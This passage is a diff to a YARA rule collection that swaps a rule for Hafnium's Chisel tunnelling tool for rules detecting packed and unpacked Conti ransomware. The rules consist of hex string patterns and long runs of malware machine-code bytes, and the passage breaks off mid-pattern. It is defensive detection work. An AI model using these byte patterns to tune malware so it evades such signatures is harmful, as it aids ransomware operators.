72 00 5c 00 70 00 61 00 72 00 61 00 6d 00 65 00 74 00 65 00 72 00 73 00 00 00 4e 00 75 00 6c 00 6c 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 50 00 69 00 70 00 65 00 73 00 00 00 00 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4c 00 53 00 41 00 00 00 00 00 52 00 65 00 73 00 74 00 72 00 69 00 63 00 74 00 41 00 6e 00 6f 00 6e 00 79 00 6d 00 6f 00 75 00 73 } condition: - uint16(0)==0x5a4d and filesize >80KB and all of them + uint16(0)==0x5a4d and filesize >20KB and 7 of ($s*) } -rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE { meta: - description = "Rule for detecting Chisel kit tool used by Hafnium" + description = "Detect unpacked Conti ransomware (May 2021)" author = "Arkbird_SOLG" - id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6" - date = "2021-02-23" - modified = "2021-04-25" + id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e" + date = "2021-05-20" + modified = "2021-05-21" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20" license_url = "N/A" - hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04" - logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de" + logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41" score = 75 - quality = 57 + quality = 75 tags = "FILE" - adversary = "Hafnium" - tlp = "white" + hash1 = "Redacted" + hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266" + hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3" + hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2" strings: - $str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e } - $str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 } - $str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 } - $str4 = { 28 65 72 72 6f 72 20 25 73 29 } - $str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 } - $str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 } - $str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73} - $str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 } - $str9 = { 70 72 6f 78 79 23 25 73 } - $seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 } - $seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 } - $seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 } + $seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 } + $seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b } + $seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff } + $seq4 = { 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 85 f6 75 2d ff 15 [4] 83 f8 06 75 22 e8 b6 ff ff ff e8 73 ff ff ff 56 ff 75 10 ff 75 0c ff 75 08 ff 35 [4] ff 15 [4] 8b f0 8b c6 5e } + $seq5 = { 55 8b ec 81 ec b4 09 00 00 a1 08 [3] 33 c5 89 45 fc 53 56 57 6a ?? 68 [4] ba 18 00 00 00 33 c9 e8 [2] ff ff 83 c4 08 6a 00 6a 00 ff d0 8b f0 85 f6 0f 88 9a 03 00 00 c7 85 8c f7 ff ff [3] 00 bb 03 00 00 00 8b 85 8c f7 ff ff 99 f7 fb 8b 85 8c f7 ff ff 8d 7b 02 85 d2 74 57 83 c0 02 03 c6 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 0f 85 64 01 00 00 66 66 0f 1f 84 00 00 00 00 00 8b 85 8c f7 ff ff 40 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 07 48 83 c8 fc 83 c0 01 74 dd e9 32 01 00 00 25 01 00 00 80 79 07 48 83 c8 fe 83 c0 01 74 47 b8 02 00 00 00 2b } + $seq6 = { 83 3b 00 c7 45 94 00 00 00 00 0f 86 57 02 00 00 8b 35 b4 21 41 00 8d 4b 14 8b 3d c8 21 41 00 8b 1d 9c 21 41 00 89 4d 90 c7 45 98 7f 00 00 00 89 b5 7c ff ff ff 89 bd 78 ff ff ff 89 5d 9c 0f 1f 40 00 8b 11 8d 45 d0 89 55 cc b9 2c 00 00 00 0f 1f 00 c6 00 00 8d 40 01 83 e9 01 75 f5 52 ff d6 8b f0 ff d7 c6 45 b4 00 bf 7f 00 00 00 c6 45 b5 42 c6 45 b6 31 c6 45 b7 2a c6 45 b8 0b c6 45 b9 63 8a 4d b5 80 7d b4 00 75 28 33 c9 66 0f 1f 44 00 00 8a 44 0d b5 0f b6 c0 83 e8 63 6b c0 25 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d b5 41 83 f9 05 72 e0 8d 45 b5 50 56 ff d3 c6 45 a0 00 c6 45 a1 51 c6 45 a2 1f c6 45 a3 2b c6 45 a4 44 c6 45 a5 51 c6 45 a6 12 c6 45 a7 45 c6 45 a8 44 c6 45 a9 26 89 45 84 8a 45 a1 80 7d a0 00 75 27 33 c9 0f 1f 00 8a 44 0d a1 0f b6 c0 83 e8 26 8d 04 80 03 c0 99 f7 ff 8d 42 7f 99 f7 ff 88 54 0d a1 41 83 f9 09 72 de 8d 45 a1 50 56 ff d3 c6 45 bc 00 8b d8 c6 45 bd 42 c6 45 be 19 c6 45 bf 46 c6 45 c0 59 8a 4d bd 80 7d bc 00 89 5d 88 75 2c 33 ff 8d 5f 7f 8a 44 3d bd 0f b6 c8 83 e9 59 8b c1 c1 e0 05 2b c1 99 f7 fb 8d 42 7f 99 f7 fb 88 54 3d bd 47 83 ff 04 72 dc 8b 5d 88 8d 45 bd 50 56 ff 55 9c c6 45 ac 00 8b f8 c6 45 ad 76 c6 45 ae 30 c6 45 af 06 c6 45 b0 21 c6 45 b1 2a 8a 4d ad 80 7d ac 00 75 24 33 c9 8a 44 0d ad 0f b6 c0 83 e8 2a 8d 04 c0 99 f7 7d 98 8d 42 7f 99 f7 7d 98 88 54 0d ad 41 83 f9 05 72 de 8d 45 ad 50 56 ff 55 9c } condition: - uint16(0)==0x5a4d and filesize >100KB and 2 of ($seq*) and 7 of ($str*) + uint16(0)==0x5a4d and filesize >50KB and 5 of ($seq*) +} +rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE +{ + meta: + description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot" + author = "Arkbird_SOLG" + id = "661182f7-4716-50d1-8d98-9fb272cf43eb" + date = "2021-05-19" + modified = "2021-05-21" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18" + license_url = "N/A" + logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5" + score = 50 + quality = 75 + tags = "FILE" + hash1 = "Redacted" + tlp = "White" + adversary = "RAAS" + level = "Experimental" + + strings: + $seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 